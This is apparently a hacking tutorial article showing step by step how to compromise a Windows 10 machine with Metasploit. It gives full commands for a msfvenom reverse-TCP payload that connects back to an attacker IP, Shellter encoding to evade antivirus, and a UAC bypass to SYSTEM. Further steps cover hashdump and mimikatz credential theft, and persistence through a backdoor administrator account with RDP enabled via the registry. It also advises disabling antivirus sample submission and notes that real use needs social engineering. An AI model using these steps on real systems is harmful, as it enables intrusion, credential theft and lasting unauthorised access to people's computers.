Introduction

The Metasploit Framework is the most commonly-used framework for hackers worldwide. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. In this article, we’ll look at how this framework within Kali Linux can be used to attack a Windows 10 machine. We shall do this through a malicious executable file using Shellter.

This article assumes the installation of Kali Linux has been done and is reachable through a bridged connection from a Windows machine on VirtualBox.

Creating a Malicious .exe File

To create the executable, you would use msfvenom as shown in the command below:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.100.4 LPORT=4444 -o /root/something32.exe

The command above instructs msfvenom to generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload. The format must be specified as being type .exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our case, the LHOST is the IP address of our attacking Kali Linux machine, and the LPORT is the port to listen on for a connection from the target once it has been compromised.

To obtain our IP address we use the ifconfig command within Kali, specifying the interface as eth0 (since we are on Ethernet) as shown below.

The screenshot below shows the output of the command on successful .exe generation.

Antivirus solutions work by detecting malicious signatures within executables. Our file will thus be flagged as malicious once within the Windows environment. We therefore have to figure out a way to modify it to bypass antivirus detection. We will encode it to make it fully undetectable, or FUD.

Making the Executable FUD (Fully Undetectable)

To encode our executable, we shall be using Shellter. Shellter works by changing the executable’s signatures from the obviously malicious one to a completely new and unique one that can bypass detection.

Note that antiviruses also check the behavior of executables and employ techniques such as heuristics scanning, so they are not just limited to checking for signatures. During our lab tests we discovered that Windows Defender, which ships by default with Windows 10, flagged the executable 6 out of the 10 times we used Shellter to perform the encoding. This is despite Windows 10 being a fresh download with latest patches applied! You will be better off purchasing Shellter Pro (or any Pro Crypter) or writing your own Crypter to avoid antivirus flagging your executables.

Also note that when writing your own, disable automatic submissions. Otherwise whatever you write, if detected as potentially-unwanted software, will be uploaded by your antivirus for analysis … And we both know how that will end.

Let’s look at how to install and run Shellter.

On your Kali Linux, download Shellter with the command below:

sudo apt-get install shellter

To launch Shellter just type shellter on the terminal.

You will be required to enter the absolute path to the executable to make FUD. Make sure to select “Auto” mode as shown below.

Shellter will then initialize and run some checks. It will then prompt you whether to run in stealth mode. Select “Y” for yes.

The next prompt will require you to enter the payload, either a custom or a listed one. You should select a listed one by typing “L”, unless you want to proceed with your own custom payload. Select the index position of the payload to use. We need a Meterpreter_Reverse_TCP, so we will have to go with “1.”

Enter LHOST and LPORT and press Enter. Shellter will run to completion and request you to press Enter.

At this point, the executable you provided will have been made undetectable to antivirus solutions.

Again, note that you are better off writing your own or purchasing a Crypter that is constantly being revised. Otherwise, most of your encoding will be flagged as malicious or potentially unwanted software.

We now need to set up a listener on the port we determined within the executable. We do this by launching Metasploit using the command msfconsole on the Kali Linux terminal.

The screenshot below shows what commands to issue within Metasploit. First, we’ll tell Metasploit to use the generic payload handler “multi/handler” using the command use multi/handler. We will then set the payload to match the one set within the executable using the command set payload windows/meterpreter/reverse_tcp. We will then set the LHOST and LPORT this way — set LHOST 192.168.100.4 and set LPORT 4444. Once done, type “run” or “exploit” and press Enter.

The screenshot below displays the output. The reverse TCP handler should begin waiting for a connection.

The next step is to execute it from a Windows perspective. In a real-world practical situation, this will require social engineering skills. Nevertheless, copy the something32 to a Windows system within the same network as the Kali system.

Executing the Payload

On copying the file to our target Windows machine, we have the screen-shot below. Execute the file.

The executable causes the payload to be executed and connect back to the attacking machine (Kali Linux). Immediately, we receive a Meterpreter session on our Kali Linux. This is demonstrated by the Meterpreter > prompt as shown below:

Since the file was not run as “administrator,” there are Meterpreter commands that can’t be run as they would result in an “access denied” response. This can be confirmed by running the getuid command, which tells us that we are running as user l3s7r0z.

To prove that the user lacks enough privileges, we attempted to run the command mimikatz_command -f sekurlsa::logonPasswords.

The result is an “Access is denied” message as shown below:

In order to gain sufficient rights, we need to perform a UAC bypass. Next we see how this can be done.

Privilege Escalation

Privilege escalation allows us to elevate privileges from our less privileged user (l3s7r0z) to a more privileged one, preferably the SYSTEM user, which has all administrative rights.

Metasploit by default provides us with some methods that allow us to elevate our privileges. On the Meterpreter prompt we use the getsystem command, as shown below:

Since the methods used by getsystem all fail, we need an alternative method of elevating privileges. We will use the comhijack exploit module that is used to bypass User Access Control. To do so, we “background” our Meterpreter session, switch our exploit from multi/handler to windows/local/bypassuac_comhijack and implement this on the session in the background using set SESSION 2.

This is shown below:

We then set the payload using set payload windows/x64/meterpreter/reverse_tcp and set the LPORT and LHOST. We then run the exploit.

We successfully receive a Meterpreter session. Typing sysinfo shows us the information of our target. getuid shows that we are running as user l3s7r0z on Windows 10, but we can elevate to SYSTEM by issuing getsystem. We can see that elevation was successful and we can confirm this by issuing getuid again, we can see we are now NT AUTHORITY\SYSTEM.

With these privileges, we can do quite a lot on our compromised target. For instance, we can obtain LM and NTLM password hashes using the hashdump command as shown above. Note that the format of the hashes above is USERNAME:SID:LM_HASH:NTLM_HASH:::. We can even obtain credentials from browsers, key managers, the domain controller, perform keylogging, capture screenshots and even stream from the webcam (this will not work on VM, it will need an actual native Windows install target).

Now that we are within the target machine, why not perform some persistence to remain within?

Persistence

Persistence allows us to gain access back to the machine whenever we need to even when the target decides to patch the vulnerability.

There are many ways of performing persistence. For example, we can code a malicious virus to always connect back to us whenever the target turns on their machine (this is called a backdoor), or even have our own user accounts within the compromised target machine. Metasploit also provides its method of persistence, discussed here.

Today, we’ll go with the second option, to have our own account within the target and enable RDP so that whenever we want, we can log into the machine and access the information we want.

Remember the NTLM hashes we were able to obtain above using the hashdump command from the mimikatz module? We can even log into any account within the target machine using any password hashes, impersonate legitimate users and download, alter or upload files.

On the Meterpreter session, we type the command shell to drop into a Windows shell on the Windows 10 target.

At the C:\WINDOWS\system32> prompt, we issue the net users command. This lists all the users within the windows machine. As we can see, there are only two users, the Administrator and the l3s7r0z user.

We add a new user Jaime and give him the password Bru73f0rc3_

The command used to do that is:

net user /add jaime Bru73f0rc3_

We then add Jaime to the administrators group so that the account can perform admin functions. The command used is:

net localgroup administrators jaime /add

We then add him to the RDP group. This will allow us to log in through RDP to the target machine, even after it has been patched to have firewall and antivirus on.

The command used is:

net localgroup “Remote Desktop Users” jaime /add

After all the setup is done for user Jaime, we can use the following command to see the user’s properties:

net user jaime

The screenshot below shows the output of the command.

In some cases RDP is not enabled at the target machine. As long as we are within the shell, we can enable it by adding a registry key.

To enable RDP, use the following command:

reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

If you would like to disable RDP for whatever purpose, you can do so by typing the following command:

reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 1 /f

The result of the operation is shown below:

From the Kali Linux machine, we can use the remmina remote connection client. If it is not installed within Kali, you can install it by typing the following command:

apt-get install remmina

Start remmina by typing remmina on the command prompt. And connect to the target using its IP address.

You will be required to accept a certificate. Do so and use the username and password used to register the Jaime account. That is:

Username: jaime

Password: Bru73f0rc3_

By default, in Windows 10, the logged-in user using Windows 10 will be required to allow you to connect. However, if they do not respond within 30 seconds, they are automatically logged out.

Security Awareness

Conclusion

In this article we have seen how the Metasploit Framework can be used to compromise a Windows 10 machine to gain a Meterpreter session. We have used Shellter to FUD our malicious executable to bypass the Windows 10 antivirus and performed privilege escalation to gain more rights on our compromised machine.

Hackers are not limited in what they can use the framework for. For instance, it can also be used to perform information gathering and pivoting through compromised networks.